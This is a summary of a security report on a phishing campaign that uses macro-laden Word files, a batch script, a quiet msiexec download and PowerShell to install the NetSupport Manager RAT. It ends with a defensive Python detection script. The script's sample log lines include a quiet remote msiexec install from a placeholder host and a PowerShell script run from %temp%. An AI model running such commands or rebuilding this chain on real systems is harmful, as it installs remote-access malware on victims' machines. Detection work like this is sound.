The legitimate remote access tool (RAT) NetSupport Manager, normally used for troubleshooting and tech support, is being abused by cybercriminals. Researchers at Palo Alto Networks’ Unit 42 have observed a spam campaign attempting to deliver a malicious Microsoft Word document disguised as a NortonLifeLock-protected file.
NortonLifeLock is a security application that, among other things, password-protects attachments. If a recipient opens the document through Microsoft Office Outlook, a dialog box appears asking the user to “allow content” in order to open the document – clicking “yes” executes the macros.
Researchers said the password is probably supplied in the body of the phishing email, since the document requires the correct one: no malicious activity takes place until the right password is entered. Once the password is accepted, the macros build and execute a batch file named ‘alpaca.bat’.
According to the researchers, the campaign uses a range of techniques to obscure its activity from both dynamic and static analysis. For instance, the batch script invokes msiexec, a legitimate component of the Windows Installer service.
It is used to install a Microsoft Intermediate Language (MSIL) binary fetched from a legitimate domain that has been compromised. Once downloaded, the binary is executed with the /q parameter, which suppresses any Windows dialogs the user would otherwise see.
The campaign uses the PowerSploit PowerShell framework to install the malicious file. The MSI drops a PowerShell script named REgistryMPZMZQYVXO.ps1 into the victim’s %temp% directory.
That script contains a second PowerShell script, which installs the NetSupport Manager RAT on the target’s system.
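Detection logic a defender could run over endpoint process-creation logs for the three stages described above: an Office application spawning a batch file, msiexec quietly installing a package from a remote URL, and PowerShell running a script out of %temp%. This is an added example, not code from Unit 42 or the original article; the pipe-separated log format, the user paths, the placeholder domain and the PowerShell command line are constructed assumptions, and the rules generalize slightly beyond the page (any Office parent process, and /qn and /quiet alongside /q).

```python
import re
from typing import List, Tuple

# Office parents worth flagging when they spawn a batch file (the page describes Word).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# msiexec quiet switches: /q as used in the campaign, plus the /qn and /quiet variants.
QUIET_RE = re.compile(r"(?:^|\s)/q(?:n|uiet)?\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# A .ps1 script located directly under a ...\Temp\ directory.
TEMP_PS1_RE = re.compile(r"\\temp\\[^\\\s\"]+\.ps1\b", re.IGNORECASE)

# Constructed sample log lines: parent_image|image|command_line (not real telemetry).
SAMPLE_LOG = [
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\cmd.exe|cmd.exe /c C:\Users\alice\AppData\Local\Temp\alpaca.bat",
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\msiexec.exe|msiexec /i http://compromised-site.example/update.msi /q",
    r"C:\Windows\System32\msiexec.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\Users\alice\AppData\Local\Temp\REgistryMPZMZQYVXO.ps1",
    # Benign: a local MSI installed quietly by the user from explorer.exe, no remote URL.
    r"C:\Windows\explorer.exe|C:\Windows\System32\msiexec.exe|msiexec /i C:\Users\alice\Downloads\7zip.msi /q",
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_line(line: str) -> List[str]:
    """Return the names of every rule that matches one log line."""
    parent, image, cmdline = line.split("|", 2)
    hits: List[str] = []
    if basename(parent) in OFFICE_APPS and ".bat" in cmdline.lower():
        hits.append("office_spawns_batch")
    if basename(image) == "msiexec.exe" and URL_RE.search(cmdline) and QUIET_RE.search(cmdline):
        hits.append("msiexec_remote_quiet")
    if basename(image) == "powershell.exe" and TEMP_PS1_RE.search(cmdline):
        hits.append("powershell_script_from_temp")
    return hits


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Run every rule over every line and return (rule, line) findings."""
    return [(rule, line) for line in lines for rule in check_line(line)]


if __name__ == "__main__":
    for rule, line in scan(SAMPLE_LOG):
        print(f"[{rule}] {line}")
```

Each rule fires on exactly one stage of the constructed chain and stays silent on the benign quiet install, so the three findings together reconstruct the sequence Word -> alpaca.bat -> msiexec -> PowerShell.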